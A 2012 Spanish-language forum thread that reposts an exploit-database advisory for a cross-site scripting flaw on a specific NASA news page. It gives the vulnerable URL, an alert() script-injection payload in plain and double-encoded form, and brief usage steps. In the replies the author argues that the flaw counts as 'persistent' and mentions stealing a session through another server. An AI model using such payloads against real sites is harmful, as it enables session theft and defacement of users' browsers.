send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSS Persistent NASA.GOV

  • 5 Respuestas
  • 3618 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 159
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« en: Agosto 23, 2012, 08:54:06 pm »
Código: Text
  1. 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0
  2. 0      _                   __           __       __                      1
  3. 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
  4. 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
  5. 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
  6. 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
  7. 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
  8. 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
  9. 1                   \ \____/ >> Exploit database separated by exploit    0
  10. 0                    \/___/          type (local, remote, DoS, etc.)     1
  11. 1                                                                        1
  12. 0   [x] Official Website: http://www.1337day.com                         0
  13. 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
  14. 0                                                                        0
  15. 1                                                                        1
  16. 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
  17. |                                                                        |
  18. |              NASA.GOV - Cross Site Scripting Persistent                |
  19. --------------------------------------------------------------------------
  20. # Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
  21. # Date          : 21-08-2012
  22. # Author        : Caleb Bucker (Independent Security Researcher)
  23. # Vendor        : NASA
  24. # Category      : misc
  25. # URL Vendor    : http://www.nasa.gov/
  26. # Tested on     : BackTrack 5 r3 - Mozilla Firefox
  27. # Contact       : calebbucker@gmail.com
  28. # Website       : www.calebbucker.blogspot.com
  29. # Greetings to  : CL-Security All Members And Friend's
  30.  
  31. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  32. SCREENSHOT:
  33.  
  34. http://img341.imageshack.us/img341/4395/snapshot408.png
  35.  
  36. http://img837.imageshack.us/img837/7151/snapshot409.png
  37. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  38.  
  39. VULNERABILITY LOCATION:
  40.  
  41. www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
  42. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  43.  
  44. CROSS SITE SCRIPTING:
  45.  
  46. www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527CalebBucker%2527%2529%253C%252fscript%253E
  47.  
  48. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  49.  
  50. HOW TO USE:
  51.  
  52. "><script>alert('XSS")</script> send it through, works on GET nothing else is really special about it.
  53.  
  54. so double encoded it will look like this:
  55.  
  56. %2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
  57. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  58.  
  59. Enjoy!
  60.  
  61. # 1337day.com [2012-08-22]
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #1 en: Agosto 23, 2012, 09:20:41 pm »
Buena esa man xd , nose que hacias mirando ahi la verdad xd.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 159
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #2 en: Agosto 23, 2012, 09:26:03 pm »
Buscando marcianos jajajaja (broma)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 159
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #3 en: Agosto 27, 2012, 05:57:48 pm »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
solo un pekeño detalle
esos no son xss persistentes :3

Lo considero PERSISTENTE, porque antes que sea REPORTADA, pude hacer muchas cosas, cosa que con el NO PERSISTENTE no se puede llegar hacer.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 159
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #4 en: Agosto 27, 2012, 06:07:35 pm »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
disculpa pero persistente son los css en los cuales se inyecta el codigo y keda activo en el sitio sin tener ke poner la url con el codigo o mandando con dom, como en guestbooks ke dejas un comntario con un xss y el admin o kien lo vea se ejecuta el codigo sin tener ke mandarle la url con modificacion en ella :3

Tratas de decir que los XSS Persistentes son cuando un atacante inyecta el code javascript y queda grabado en el sitio? EPIC FAIL -_-

No compares un Modulo con un guestbooks, las cuales estan programadas para que cualquiera que lo vea, pueda leer el code.

Como te vuelvo a repetir, lo considero Persistente porque pude hacer pruebas mediante otro servidor para obtener una session y otras cosas mas.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #5 en: Agosto 28, 2012, 01:40:22 am »
Chicos Veo q el tema se esta desviando por favor Peleas fuera del foro, o me vere Obligado a cerrar el tema.

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!